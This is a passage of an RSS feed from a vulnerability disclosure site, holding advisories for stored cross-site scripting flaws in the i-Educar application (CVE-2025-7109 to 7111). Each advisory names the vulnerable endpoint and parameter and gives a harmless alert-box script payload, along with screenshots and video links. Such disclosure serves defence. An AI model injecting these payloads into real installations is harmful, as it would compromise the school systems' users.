&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB PacXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7109/image.png&amp;#34;
	width=&amp;#34;1875&amp;#34;
	height=&amp;#34;1001&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7109/image_hu_ce7d7ad02b44b12.png 480w, /p/cve-2025-7109/image_hu_9a61a6d6d6449abc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7109/image-1.png&amp;#34;
	width=&amp;#34;1889&amp;#34;
	height=&amp;#34;997&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7109/image-1_hu_60a60555d7528d3a.png 480w, /p/cve-2025-7109/image-1_hu_1abeeb2b65e62c22.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7109/image-2.png&amp;#34;
	width=&amp;#34;1701&amp;#34;
	height=&amp;#34;1013&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7109/image-2_hu_ee4aa3fddc8a48a5.png 480w, /p/cve-2025-7109/image-2_hu_eb7ac958f3edf421.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;167&amp;#34;
		data-flex-basis=&amp;#34;403px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/Pe33X_zm_TQ&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/Pe33X_zm_TQ&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7110</title>
        <link>https://www.cvehunters.com/p/cve-2025-7110/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7110/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7110-cross-site-scripting-xss-stored-endpoint-educar_escola_lstphp-parameter-escola&amp;#34;&amp;gt;CVE-2025-7110: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_escola_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7110-cross-site-scripting-xss-stored-endpoint-educar_escola_lstphp-parameter-escola&amp;#34;&amp;gt;CVE-2025-7110: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_escola_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7110/image.png&amp;#34;
	width=&amp;#34;1886&amp;#34;
	height=&amp;#34;996&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7110/image_hu_b07da12df38ab222.png 480w, /p/cve-2025-7110/image_hu_ea38d215407e28e3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7110/image-1.png&amp;#34;
	width=&amp;#34;1805&amp;#34;
	height=&amp;#34;970&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7110/image-1_hu_eba69eb637b93ae8.png 480w, /p/cve-2025-7110/image-1_hu_e69951c2ec55d9fb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;186&amp;#34;
		data-flex-basis=&amp;#34;446px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/N3pu_GJHjCw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/N3pu_GJHjCw&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7111</title>
        <link>https://www.cvehunters.com/p/cve-2025-7111/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7111/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7111-cross-site-scripting-xss-stored-endpoint-educar_curso_detphp-parameter-curso&amp;#34;&amp;gt;CVE-2025-7111: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_curso_det.php?cod_curso=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7111-cross-site-scripting-xss-stored-endpoint-educar_curso_detphp-parameter-curso&amp;#34;&amp;gt;CVE-2025-7111: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_curso_det.php?cod_curso=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7111/image.png&amp;#34;
	width=&amp;#34;1845&amp;#34;
	height=&amp;#34;985&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7111/image_hu_789b98f8f3f54c8b.png 480w, /p/cve-2025-7111/image_hu_745ad6b2ae48e3f3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7111/image-1.png&amp;#34;
	width=&amp;#34;1754&amp;#34;
	height=&amp;#34;876&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7111/image-1_hu_1ed9a19b48325f7f.png 480w, /p/cve-2025-7111/image-1_hu_8894ad2a5a40a977.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;480px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/NtkxXKrSa6o&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/NtkxXKrSa6o&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
